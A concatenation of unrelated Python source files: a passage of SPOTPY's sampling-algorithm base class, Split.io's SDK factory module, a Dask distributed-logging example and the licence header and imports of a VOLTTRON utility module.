    # collection timing issue). This slows the whole simulation down; Python 3
    # does not need the workaround.
from Queue import Queue
class _RunStatistic(object):
"""
    This class checks for each run whether the objective function improved and
    holds the best parameter set.
    Every _algorithm has an object of this class as its status.
    Usage:
    status = _RunStatistic(repetitions, algorithm_name, optimization_direction, parnames)
    status(objectivefunction, params)
"""
def __init__(self, repetitions, algorithm_name, optimization_direction, parnames):
        self.optimization_direction = optimization_direction  # grid, maximize, minimize
print('Initializing the ',algorithm_name,' with ',repetitions,' repetitions')
if optimization_direction == 'minimize':
self.compare = self.minimizer
print('The objective function will be minimized')
if optimization_direction == 'maximize':
self.compare = self.maximizer
            print('The objective function will be maximized')
if optimization_direction == 'grid':
self.compare = self.grid
self.rep = 0
self.parnames = parnames
self.parameters= len(parnames)
self.params_min = [np.nan]*self.parameters
self.params_max = [np.nan]*self.parameters
self.objectivefunction_min = 1e308
self.objectivefunction_max = -1e308
self.starttime = time.time()
self.last_print = time.time()
self.repetitions = repetitions
self.stop = False
def minimizer(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
def maximizer(self, objval, params):
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def grid(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def __call__(self, objectivefunction, params, block_print=False):
self.rep+=1
if type(objectivefunction) == type([]): #TODO: change to iterable
self.compare(objectivefunction[0], params)
elif type(objectivefunction) == type(np.array([])):
pass
else:
self.compare(objectivefunction, params)
if self.rep == self.repetitions:
self.stop = True
if not block_print:
self.print_status()
def print_status(self):
        # get str showing approximate time left to end of simulation in H, M, S
acttime = time.time()
        # Refresh the progressbar every two seconds
if acttime - self.last_print >= 2:
avg_time_per_run = (acttime - self.starttime) / (self.rep + 1)
timestr = time.strftime("%H:%M:%S", time.gmtime(round(avg_time_per_run * (self.repetitions - (self.rep + 1)))))
if self.optimization_direction == 'minimize':
text = '%i of %i, minimal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, timestr)
if self.optimization_direction == 'maximize':
text = '%i of %i, maximal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_max, timestr)
if self.optimization_direction == 'grid':
text = '%i of %i, min objf=%g, max objf=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, self.objectivefunction_max, timestr)
print(text)
self.last_print = time.time()
def print_status_final(self):
print('\n*** Final SPOTPY summary ***')
print('Total Duration: ' + str(round((time.time() - self.starttime), 2)) + ' seconds')
print('Total Repetitions:', self.rep)
if self.optimization_direction == 'minimize':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
if self.optimization_direction == 'maximize':
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
if self.optimization_direction == 'grid':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
print('******************************\n')
def __repr__(self):
return 'Min objectivefunction: %g \n Max objectivefunction: %g' % (
self.objectivefunction_min, self.objectivefunction_max)
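# A minimal usage sketch (illustration only, not part of SPOTPY) of how _RunStatistic tracks
# the best objective function value and parameter set; the names and values are made up:
#
#     status = _RunStatistic(repetitions=3, algorithm_name='demo',
#                            optimization_direction='minimize', parnames=['x', 'y'])
#     status(2.5, [0.1, 0.2])
#     status(1.0, [0.3, 0.4])
#     status(4.0, [0.5, 0.6])   # status.stop is now True (3 of 3 repetitions done)
#     print(repr(status))       # Min objectivefunction: 1 ...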
class _algorithm(object):
"""
Implements an algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
            Should return the true values as returned by the model.
dbname: str
Name of the database where parameter, objectivefunction value and simulation
results will be saved.
dbformat: str
        ram: fast, suited for short sampling times. No file will be created and results are saved in an array.
csv: A csv file will be created, which you can import afterwards.
parallel: str
        seq: Sequential sampling (default): Normal iterations on one core of your cpu.
mpc: Multi processing: Iterations on all available cores on your (single) pc
        mpi: Message Passing Interface: Parallel computing on high performance computing clusters, mpi4py needs to be installed
save_threshold: float or list
Compares the given value/list of values with return value/list of values from spot_setup.objectivefunction.
If the objectivefunction value is higher, the results are saved in the database. If not they are ignored (saves storage).
db_precision:np.float type
set np.float16, np.float32 or np.float64 for rounding of floats in the output database
Default is np.float16
sim_timeout: float, int or None, default: None
the defined model given in the spot_setup class can be controlled to break after 'sim_timeout' seconds if
sim_timeout is not None.
        If the model run has been broken, simply '[nan]' will be returned.
random_state: int or None, default: None
        the algorithm uses the number in random_state as seed for numpy. This way stochastic processes can be reproduced.
"""
_unaccepted_parameter_types = (parameter.List, )
def __init__(self, spot_setup, dbname=None, dbformat=None, dbinit=True,
dbappend=False, parallel='seq', save_sim=True, breakpoint=None,
backup_every_rep=100, save_threshold=-np.inf, db_precision=np.float16,
sim_timeout=None, random_state=None, optimization_direction='grid', algorithm_name=''):
# Initialize the user defined setup class
self.setup = spot_setup
param_info = parameter.get_parameters_array(self.setup, unaccepted_parameter_types=self._unaccepted_parameter_types)
self.all_params = param_info['random']
self.constant_positions = parameter.get_constant_indices(spot_setup)
if self.constant_positions:
self.non_constant_positions = []
for i, val in enumerate(self.all_params):
if self.all_params[i] not in self.constant_positions:
self.non_constant_positions.append(i)
else:
self.non_constant_positions = np.arange(0,len(self.all_params))
self.parameter = self.get_parameters
self.parnames = param_info['name']
self.algorithm_name = algorithm_name
# Create a type to hold the parameter values using a namedtuple
self.partype = parameter.ParameterSet(param_info)
self.evaluation = self.setup.evaluation()
self.save_sim = save_sim
self.optimization_direction = optimization_direction
self.dbname = dbname or 'customDb'
self.dbformat = dbformat or 'ram'
self.db_precision = db_precision
self.breakpoint = breakpoint
self.backup_every_rep = backup_every_rep
# Two parameters to control the data base handling
# 'dbinit' triggers the initial creation of the data base file
# 'dbappend' used to append to the existing data base, after restart
self.dbinit = dbinit
self.dbappend = dbappend
# Set the random state
        if random_state is None: #ToDo: Have to discuss if these 3 lines are necessary.
random_state = np.random.randint(low=0, high=2**30)
np.random.seed(random_state)
        # If the value is not None a timeout will be set so that the simulation will break after sim_timeout seconds without returning a value
self.sim_timeout = sim_timeout
self.save_threshold = save_threshold
if breakpoint == 'read' or breakpoint == 'readandwrite':
print('Reading backupfile')
try:
open(self.dbname+'.break')
except FileNotFoundError:
print('Backupfile not found')
self.dbappend = True
# Now a repeater (ForEach-object) is loaded
        # A repeater is a convenient wrapper to repeat tasks
# We have the same interface for sequential and for parallel tasks
if parallel == 'seq':
from spotpy.parallel.sequential import ForEach
elif parallel == 'mpi':
from spotpy.parallel.mpi import ForEach
        # MPC is based on pathos multiprocessing and uses an ordered map, so results are given back
        # in the same order as the parameters
elif parallel == 'mpc':
from spotpy.parallel.mproc import ForEach
        # UMPC is based on pathos multiprocessing and uses an unordered map, so results are given back
        # in the order in which the subprocesses finish. This may speed up the whole simulation process,
        # but is not recommended if objective functions depend on the order of the data, because the
        # order of the results is chaotic and randomized
elif parallel == 'umpc':
from spotpy.parallel.umproc import ForEach
else:
raise ValueError(
"'%s' is not a valid keyword for parallel processing" % parallel)
# This is the repeater for the model runs. The simulate method does the work
# If you need different tasks, the repeater can be pushed into a "phase" using the
# setphase function. The simulate method can check the current phase and dispatch work
# to other functions. This is introduced for sceua to differentiate between burn in and
# the normal work on the chains
self.repeat = ForEach(self.simulate)
# method "save" needs to know whether objective function result is list or float, default is float
self.like_struct_typ = type(1.1)
def __str__(self):
return '{type}({mtype}())->{dbname}'.format(
type=type(self).__name__,
mtype=type(self.setup).__name__,
dbname=self.dbname)
def __repr__(self):
return '{type}()'.format(type=type(self).__name__)
def get_parameters(self):
"""
Returns the parameter array from the setup
"""
pars = parameter.get_parameters_array(self.setup)
return pars[self.non_constant_positions]
def set_repetiton(self, repetitions):
self.status = _RunStatistic(repetitions, self.algorithm_name,
self.optimization_direction, self.parnames)
# In MPI, this command will do nothing on the master process
# but the worker processes are going to wait for jobs.
# Hence the workers will only receive parameters for the
# simulate function, new calculation phases and the termination
self.repeat.start()
def final_call(self):
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: # Happens if no database was assigned
pass
self.status.print_status_final()
def _init_database(self, like, randompar, simulations):
if self.dbinit:
print('Initialize database...')
self.datawriter = database.get_datawriter(self.dbformat,
self.dbname, self.parnames, like, randompar, simulations,
save_sim=self.save_sim, dbappend=self.dbappend,
dbinit=self.dbinit, db_precision=self.db_precision,
setup=self.setup)
self.dbinit = False
def __is_list_type(self, data):
if type(data) == type:
return data == list or data == type(np.array([]))
else:
return type(data) == list or type(data) == type(np.array([]))
def save(self, like, randompar, simulations, chains=1):
# Initialize the database if no run was performed so far
self._init_database(like, randompar, simulations)
# Test if like and the save threshold are float/list and compare accordingly
if self.__is_list_type(like) and self.__is_list_type(self.save_threshold):
if all(i > j for i, j in zip(like, self.save_threshold)): #Compares list/list
self.datawriter.save(like, randompar, simulations, chains=chains)
if (not self.__is_list_type(like)) and (not self.__is_list_type(self.save_threshold)):
if like>self.save_threshold: #Compares float/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if self.__is_list_type(like) and (not self.__is_list_type(self.save_threshold)):
if like[0]>self.save_threshold: #Compares list/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if (not self.__is_list_type(like)) and self.__is_list_type(self.save_threshold): #Compares float/list
            if (like > self.save_threshold).all():
self.datawriter.save(like, randompar, simulations, chains=chains)
def read_breakdata(self, dbname):
''' Read data from a pickle file if a breakpoint is set.
Reason: In case of incomplete optimizations, old data can be restored. '''
import pickle
with open(dbname+'.break', 'rb') as breakfile:
work,backuptime,repos,obmin,obmax=pickle.load(breakfile)
self.status.starttime=self.status.starttime-backuptime
self.status.rep=repos
self.status.objectivefunction_min=obmin
self.status.objectivefunction_max=obmax
return work
def write_breakdata(self, dbname, work):
''' Write data to a pickle file if a breakpoint has been set.'''
import pickle
work=(work,self.status.last_print-self.status.starttime,self.status.rep,self.status.objectivefunction_min,self.status.objectivefunction_max)
with open(str(dbname)+'.break', 'wb') as breakfile:
pickle.dump(work, breakfile)
def getdata(self):
return self.datawriter.getdata()
def update_params(self, params):
#Add potential Constant parameters
self.all_params[self.non_constant_positions] = params
return self.all_params
    def postprocessing(self, rep, params, simulation, chains=1, save_run=True, negativlike=False, block_print=False): # TODO: rep not necessary
params = self.update_params(params)
if negativlike is True:
like = -self.getfitness(simulation=simulation, params=params)
else:
like = self.getfitness(simulation=simulation, params=params)
# Save everything in the database, if save is True
# This is needed as some algorithms just want to know the fitness,
# before they actually save the run in a database (e.g. sce-ua)
self.status(like,params,block_print=block_print)
if save_run is True and simulation is not None:
self.save(like, params, simulations=simulation, chains=chains)
if type(like)==type([]):
return like[0]
else:
return like
def getfitness(self, simulation, params):
"""
Calls the user defined spot_setup objectivefunction
"""
try:
#print('Using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation, params = (params,self.parnames))
except TypeError: # Happens if the user does not allow to pass parameter in the spot_setup.objectivefunction
#print('Not using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation)
def simulate(self, id_params_tuple):
"""This is a simple wrapper of the model, returning the result together with
the run id and the parameters. This is needed, because some parallel things
can mix up the ordering of runs
"""
id, params = id_params_tuple
self.all_params[self.non_constant_positions] = params #TODO: List parameters are not updated if not accepted for the algorithm, we may have to warn/error if list is given
all_params = self.all_params
# we need a layer to fetch returned data from a threaded process into a queue.
def model_layer(q,all_params):
# Call self.model with a namedtuple instead of another sequence
q.put(self.setup.simulation(self.partype(*all_params)))
        # starting a queue, which in python2.7 is a multiprocessing class and can cause errors because of
        # incompatibility with the main thread. Therefore only for older Python versions a workaround follows
que = Queue()
sim_thread = threading.Thread(target=model_layer, args=(que, all_params))
sim_thread.daemon = True
sim_thread.start()
        # If self.sim_timeout is not None the model will break after self.sim_timeout seconds, otherwise it
        # runs as long as it needs to run
sim_thread.join(self.sim_timeout)
# If no result from the thread is given, i.e. the thread was killed from the watcher the default result is
# '[nan]' and will not be saved. Otherwise get the result from the thread
model_result = None
if not que.empty():
model_result = que.get()
return id, params, model_result
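# Illustrative sketch (not part of SPOTPY) of the life cycle a concrete sampler built on
# _algorithm typically goes through; 'MySampler' and 'param_generator' are hypothetical names:
#
#     sampler = MySampler(spot_setup, dbname='demo', dbformat='ram', algorithm_name='my sampler')
#     sampler.set_repetiton(100)                       # creates the _RunStatistic status and starts the repeater
#     for id, params, sim in sampler.repeat(param_generator()):
#         sampler.postprocessing(id, params, sim)      # computes the objective function and stores the run
#     sampler.final_call()                             # stops the repeater and prints the final summary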
|
factory.py
|
"""A module for Split.io Factories."""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import threading
from collections import Counter
from enum import Enum
import six
from splitio.client.client import Client
from splitio.client import input_validator
from splitio.client.manager import SplitManager
from splitio.client.config import DEFAULT_CONFIG
from splitio.client import util
from splitio.client.listener import ImpressionListenerWrapper
# Storage
from splitio.storage.inmemmory import InMemorySplitStorage, InMemorySegmentStorage, \
InMemoryImpressionStorage, InMemoryEventStorage, InMemoryTelemetryStorage
from splitio.storage.adapters import redis
from splitio.storage.redis import RedisSplitStorage, RedisSegmentStorage, RedisImpressionsStorage, \
RedisEventsStorage, RedisTelemetryStorage
from splitio.storage.adapters.uwsgi_cache import get_uwsgi
from splitio.storage.uwsgi import UWSGIEventStorage, UWSGIImpressionStorage, UWSGISegmentStorage, \
UWSGISplitStorage, UWSGITelemetryStorage
# APIs
from splitio.api.client import HttpClient
from splitio.api.splits import SplitsAPI
from splitio.api.segments import SegmentsAPI
from splitio.api.impressions import ImpressionsAPI
from splitio.api.events import EventsAPI
from splitio.api.telemetry import TelemetryAPI
# Tasks
from splitio.tasks.split_sync import SplitSynchronizationTask
from splitio.tasks.segment_sync import SegmentSynchronizationTask
from splitio.tasks.impressions_sync import ImpressionsSyncTask
from splitio.tasks.events_sync import EventsSyncTask
from splitio.tasks.telemetry_sync import TelemetrySynchronizationTask
# Localhost stuff
from splitio.client.localhost import LocalhostEventsStorage, LocalhostImpressionsStorage, \
LocalhostSplitSynchronizationTask, LocalhostTelemetryStorage
_LOGGER = logging.getLogger(__name__)
_INSTANTIATED_FACTORIES = Counter()
_INSTANTIATED_FACTORIES_LOCK = threading.RLock()
class Status(Enum):
"""Factory Status."""
NOT_INITIALIZED = 'NOT_INITIALIZED'
READY = 'READY'
DESTROYED = 'DESTROYED'
class TimeoutException(Exception):
"""Exception to be raised upon a block_until_ready call when a timeout expires."""
pass
class SplitFactory(object): # pylint: disable=too-many-instance-attributes
"""Split Factory/Container class."""
def __init__( # pylint: disable=too-many-arguments
self,
apikey,
storages,
labels_enabled,
apis=None,
tasks=None,
sdk_ready_flag=None,
impression_listener=None
):
"""
Class constructor.
:param storages: Dictionary of storages for all split models.
:type storages: dict
:param labels_enabled: Whether the impressions should store labels or not.
:type labels_enabled: bool
:param apis: Dictionary of apis client wrappers
:type apis: dict
        :param tasks: Dictionary of synchronization tasks
:type tasks: dict
:param sdk_ready_flag: Event to set when the sdk is ready.
:type sdk_ready_flag: threading.Event
:param impression_listener: User custom listener to handle impressions locally.
:type impression_listener: splitio.client.listener.ImpressionListener
"""
self._apikey = apikey
self._logger = logging.getLogger(self.__class__.__name__)
self._storages = storages
self._labels_enabled = labels_enabled
self._apis = apis if apis else {}
self._tasks = tasks if tasks else {}
self._sdk_ready_flag = sdk_ready_flag
self._impression_listener = impression_listener
# If we have a ready flag, it means we have sync tasks that need to finish
# before the SDK client becomes ready.
if self._sdk_ready_flag is not None:
self._status = Status.NOT_INITIALIZED
# add a listener that updates the status to READY once the flag is set.
ready_updater = threading.Thread(target=self._update_status_when_ready)
ready_updater.setDaemon(True)
ready_updater.start()
else:
self._status = Status.READY
def _update_status_when_ready(self):
"""Wait until the sdk is ready and update the status."""
self._sdk_ready_flag.wait()
self._status = Status.READY
def _get_storage(self, name):
"""
Return a reference to the specified storage.
:param name: Name of the requested storage.
:type name: str
:return: requested factory.
:rtype: object
"""
return self._storages[name]
def client(self):
"""
Return a new client.
        This client is only a set of references to structures held by the factory.
        Creating one is a fast operation and it is safe to do so anywhere.
"""
return Client(self, self._labels_enabled, self._impression_listener)
def manager(self):
"""
Return a new manager.
        This manager is only a set of references to structures held by the factory.
        Creating one is a fast operation and it is safe to do so anywhere.
"""
return SplitManager(self)
def block_until_ready(self, timeout=None):
"""
Blocks until the sdk is ready or the timeout specified by the user expires.
:param timeout: Number of seconds to wait (fractions allowed)
:type timeout: int
"""
if self._sdk_ready_flag is not None:
ready = self._sdk_ready_flag.wait(timeout)
if not ready:
raise TimeoutException('SDK Initialization: time of %d exceeded' % timeout)
@property
def ready(self):
"""
Return whether the factory is ready.
        :return: True if the factory is ready. False otherwise.
:rtype: bool
"""
return self._status == Status.READY
def destroy(self, destroyed_event=None):
"""
Destroy the factory and render clients unusable.
        Destroy frees up storage taken by split data, flushes impressions & events,
and invalidates the clients, making them return control.
:param destroyed_event: Event to signal when destroy process has finished.
:type destroyed_event: threading.Event
"""
if self.destroyed:
self._logger.info('Factory already destroyed.')
return
try:
if destroyed_event is not None:
stop_events = {name: threading.Event() for name in self._tasks.keys()}
for name, task in six.iteritems(self._tasks):
task.stop(stop_events[name])
def _wait_for_tasks_to_stop():
for event in stop_events.values():
event.wait()
destroyed_event.set()
wait_thread = threading.Thread(target=_wait_for_tasks_to_stop)
wait_thread.setDaemon(True)
wait_thread.start()
else:
for task in self._tasks.values():
task.stop()
finally:
self._status = Status.DESTROYED
with _INSTANTIATED_FACTORIES_LOCK:
_INSTANTIATED_FACTORIES.subtract([self._apikey])
@property
def destroyed(self):
"""
Return whether the factory has been destroyed or not.
:return: True if the factory has been destroyed. False otherwise.
:rtype: bool
"""
return self._status == Status.DESTROYED
def _wrap_impression_listener(listener, metadata):
"""
Wrap the impression listener if any.
:param listener: User supplied impression listener or None
:type listener: splitio.client.listener.ImpressionListener | None
:param metadata: SDK Metadata
:type metadata: splitio.client.util.SdkMetadata
"""
if listener is not None:
return ImpressionListenerWrapper(listener, metadata)
return None
def _build_in_memory_factory(api_key, config, sdk_url=None, events_url=None): # pylint: disable=too-many-locals
"""Build and return a split factory tailored to the supplied config."""
if not input_validator.validate_factory_instantiation(api_key):
return None
cfg = DEFAULT_CONFIG.copy()
cfg.update(config)
http_client = HttpClient(
sdk_url=sdk_url,
events_url=events_url,
timeout=cfg.get('connectionTimeout')
)
sdk_metadata = util.get_metadata(cfg)
apis = {
'splits': SplitsAPI(http_client, api_key),
'segments': SegmentsAPI(http_client, api_key),
'impressions': ImpressionsAPI(http_client, api_key, sdk_metadata),
'events': EventsAPI(http_client, api_key, sdk_metadata),
'telemetry': TelemetryAPI(http_client, api_key, sdk_metadata)
}
if not input_validator.validate_apikey_type(apis['segments']):
return None
storages = {
'splits': InMemorySplitStorage(),
'segments': InMemorySegmentStorage(),
'impressions': InMemoryImpressionStorage(cfg['impressionsQueueSize']),
'events': InMemoryEventStorage(cfg['eventsQueueSize']),
'telemetry': InMemoryTelemetryStorage()
}
# Synchronization flags
splits_ready_flag = threading.Event()
segments_ready_flag = threading.Event()
sdk_ready_flag = threading.Event()
tasks = {
'splits': SplitSynchronizationTask(
apis['splits'],
storages['splits'],
cfg['featuresRefreshRate'],
splits_ready_flag
),
'segments': SegmentSynchronizationTask(
apis['segments'],
storages['segments'],
storages['splits'],
cfg['segmentsRefreshRate'],
segments_ready_flag
),
'impressions': ImpressionsSyncTask(
apis['impressions'],
storages['impressions'],
cfg['impressionsRefreshRate'],
cfg['impressionsBulkSize']
),
'events': EventsSyncTask(
apis['events'],
storages['events'],
cfg['eventsPushRate'],
cfg['eventsBulkSize'],
),
'telemetry': TelemetrySynchronizationTask(
apis['telemetry'],
storages['telemetry'],
cfg['metricsRefreshRate']
)
}
# Start tasks that have no dependencies
tasks['splits'].start()
tasks['impressions'].start()
tasks['events'].start()
tasks['telemetry'].start()
storages['events'].set_queue_full_hook(tasks['events'].flush)
storages['impressions'].set_queue_full_hook(tasks['impressions'].flush)
def split_ready_task():
"""Wait for splits to be ready and start fetching segments."""
splits_ready_flag.wait()
tasks['segments'].start()
def segment_ready_task():
"""Wait for segments to be ready and set the main ready flag."""
segments_ready_flag.wait()
sdk_ready_flag.set()
split_completion_thread = threading.Thread(target=split_ready_task)
split_completion_thread.setDaemon(True)
split_completion_thread.start()
segment_completion_thread = threading.Thread(target=segment_ready_task)
segment_completion_thread.setDaemon(True)
segment_completion_thread.start()
return SplitFactory(
api_key,
storages,
cfg['labelsEnabled'],
apis,
tasks,
sdk_ready_flag,
impression_listener=_wrap_impression_listener(cfg['impressionListener'], sdk_metadata)
)
def _build_redis_factory(api_key, config):
"""Build and return a split factory with redis-based storage."""
cfg = DEFAULT_CONFIG.copy()
cfg.update(config)
sdk_metadata = util.get_metadata(cfg)
redis_adapter = redis.build(cfg)
cache_enabled = cfg.get('redisLocalCacheEnabled', False)
cache_ttl = cfg.get('redisLocalCacheTTL', 5)
storages = {
'splits': RedisSplitStorage(redis_adapter, cache_enabled, cache_ttl),
'segments': RedisSegmentStorage(redis_adapter),
'impressions': RedisImpressionsStorage(redis_adapter, sdk_metadata),
'events': RedisEventsStorage(redis_adapter, sdk_metadata),
'telemetry': RedisTelemetryStorage(redis_adapter, sdk_metadata)
}
return SplitFactory(
api_key,
storages,
cfg['labelsEnabled'],
impression_listener=_wrap_impression_listener(cfg['impressionListener'], sdk_metadata)
)
def _build_uwsgi_factory(api_key, config):
"""Build and return a split factory with redis-based storage."""
cfg = DEFAULT_CONFIG.copy()
cfg.update(config)
sdk_metadata = util.get_metadata(cfg)
uwsgi_adapter = get_uwsgi()
storages = {
'splits': UWSGISplitStorage(uwsgi_adapter),
'segments': UWSGISegmentStorage(uwsgi_adapter),
'impressions': UWSGIImpressionStorage(uwsgi_adapter),
'events': UWSGIEventStorage(uwsgi_adapter),
'telemetry': UWSGITelemetryStorage(uwsgi_adapter)
}
return SplitFactory(
api_key,
storages,
cfg['labelsEnabled'],
impression_listener=_wrap_impression_listener(cfg['impressionListener'], sdk_metadata)
)
def _build_localhost_factory(config):
"""Build and return a localhost factory for testing/development purposes."""
cfg = DEFAULT_CONFIG.copy()
cfg.update(config)
storages = {
'splits': InMemorySplitStorage(),
'segments': InMemorySegmentStorage(), # not used, just to avoid possible future errors.
'impressions': LocalhostImpressionsStorage(),
'events': LocalhostEventsStorage(),
'telemetry': LocalhostTelemetryStorage()
}
ready_event = threading.Event()
tasks = {'splits': LocalhostSplitSynchronizationTask(
cfg['splitFile'],
storages['splits'],
cfg['featuresRefreshRate'],
ready_event
)}
tasks['splits'].start()
return SplitFactory('localhost', storages, False, None, tasks, ready_event)
def get_factory(api_key, **kwargs):
"""Build and return the appropriate factory."""
try:
_INSTANTIATED_FACTORIES_LOCK.acquire()
if _INSTANTIATED_FACTORIES:
if api_key in _INSTANTIATED_FACTORIES:
_LOGGER.warning(
"factory instantiation: You already have %d %s with this API Key. "
"We recommend keeping only one instance of the factory at all times "
"(Singleton pattern) and reusing it throughout your application.",
_INSTANTIATED_FACTORIES[api_key],
'factory' if _INSTANTIATED_FACTORIES[api_key] == 1 else 'factories'
)
else:
_LOGGER.warning(
"factory instantiation: You already have an instance of the Split factory. "
"Make sure you definitely want this additional instance. "
"We recommend keeping only one instance of the factory at all times "
"(Singleton pattern) and reusing it throughout your application."
)
config = kwargs.get('config', {})
if api_key == 'localhost':
return _build_localhost_factory(config)
if 'redisHost' in config or 'redisSentinels' in config:
return _build_redis_factory(api_key, config)
if 'uwsgiClient' in config:
return _build_uwsgi_factory(api_key, config)
return _build_in_memory_factory(
api_key,
config,
kwargs.get('sdk_api_base_url'),
kwargs.get('events_api_base_url')
)
finally:
_INSTANTIATED_FACTORIES.update([api_key])
_INSTANTIATED_FACTORIES_LOCK.release()
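# A brief usage sketch (an assumption for illustration, not taken from the code above):
# building a factory, waiting for it to become ready and getting a client.
# 'SOME_API_KEY' is a placeholder.
#
#     factory = get_factory('SOME_API_KEY', config={'impressionsRefreshRate': 30})
#     try:
#         factory.block_until_ready(5)   # raises TimeoutException if the SDK is not ready in 5 seconds
#     except TimeoutException:
#         pass
#     client = factory.client()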
|
example.py
|
"""
An example of how logging can be added to a Dask/Dask Distributed system where
workers are in different threads or processes.
"""
from dask import compute, delayed
from dask.distributed import Client
import logging
from logging.config import fileConfig
import logging.handlers
import multiprocessing
from os import path  # needed by configure_logging below
from random import choice, random
import time
LEVELS = [
logging.DEBUG,
logging.INFO,
logging.WARNING,
logging.ERROR,
logging.CRITICAL,
]
MESSAGES = [
'Example message #1',
'Example message #2',
'Example message #3',
]
def configure_logging():
"""
Configures the logger.
"""
if path.exists('logging.conf'):
fileConfig('logging.conf',
disable_existing_loggers=False,
defaults={'logfile_name': 'loggingdemo.log'})
else:
log_format = '%(asctime)s %(name)s %(levelname)-8s %(message)s'
logging.basicConfig(format=log_format)
def worker_logging_configurer(queue):
"""
Configures the logging for a worker process.
Args:
queue -- the queue to which messages should be sent.
"""
handler = logging.handlers.QueueHandler(queue)
root = logging.getLogger()
root.addHandler(handler)
root.setLevel(logging.DEBUG)
@delayed
def worker_task(task_id):
"""
This is a dummy task for a worker to run, it's simulating doing some work
and creating some random log messages and random levels.
Args:
        task_id -- the id of this task so we can make it clear which is which in the
logging demo.
"""
name = f'{task_id}'
logger = logging.getLogger()
logger.info('Worker started: %s' % name)
for i in range(10):
time.sleep(random())
level = choice(LEVELS)
message = choice(MESSAGES)
logger.log(level, message)
logger.info('Worker finished: %s' % name)
class LogListener:
"""
Manages the Listener process and configuration of the message queue.
"""
def __init__(self, logging_configurer):
"""
Initialises the Log Listener and the queue and process used.
"""
self._logging_configurer = logging_configurer
self._manager = multiprocessing.Manager()
self._queue = self._manager.Queue(-1)
self._listener = None
@property
def queue(self):
"""
Exposes the queue which needs to be passed to other processes for
logging.
"""
return self._queue
def start(self):
"""
Start the Log Listener process
"""
self._listener = \
multiprocessing.Process(target=self._listener_process)
self._listener.start()
def stop(self):
"""
Stop the Log Listener process and clean up.
"""
self._queue.put_nowait(None)
self._listener.join()
def _listener_process(self):
"""
The logging main loop to be executed in the logging process.
"""
self._logging_configurer()
while True:
try:
record = self._queue.get()
                # None is used as a sentinel to tell the listener to quit.
if record is None:
break
logger = logging.getLogger(record.name)
logger.handle(record)
except Exception:
import sys, traceback
print('Logging error:', file=sys.stderr)
traceback.print_exc(file=sys.stderr)
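# A minimal sketch (not part of the original example) of driving the LogListener class above
# directly, reusing configure_logging and worker_logging_configurer defined earlier:
#
#     listener = LogListener(configure_logging)
#     listener.start()
#     worker_logging_configurer(listener.queue)   # would normally run inside each worker process
#     logging.getLogger(__name__).info('hello from a worker')
#     listener.stop()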
def main():
"""
This function represents the main function of your Dask based system.
In this example it creates a simple set of workers and launches some
dummy tasks that just create random log messages.
"""
    # Configure the log listener and launch it in a separate process
log_listener = LogListener(configure_logging)
log_listener.start()
# Launch some Dask workers
client = Client(threads_per_worker=1, n_workers=10)
    # Run the log configuration code on each worker in the Dask cluster
client.run(worker_logging_configurer, log_listener.queue)
    # Create some dummy tasks to run on the workers
# This is where your core computation would be in a real system.
tasks = [worker_task(i) for i in range(10)]
# Launch the work on the cluster
compute(tasks)
# This is the end of the core computation and now comes any cleanup code.
# Stop the log listener and clean up
log_listener.stop()
if __name__ == '__main__':
main()
|
utils.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2017, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""VOLTTRON platform™ agent helper classes/functions."""
import argparse
import calendar
import errno
import logging
import sys
import syslog
import traceback
from datetime import datetime, tzinfo, timedelta
import gevent
import os
import pytz
import re
import stat
import time
import yaml
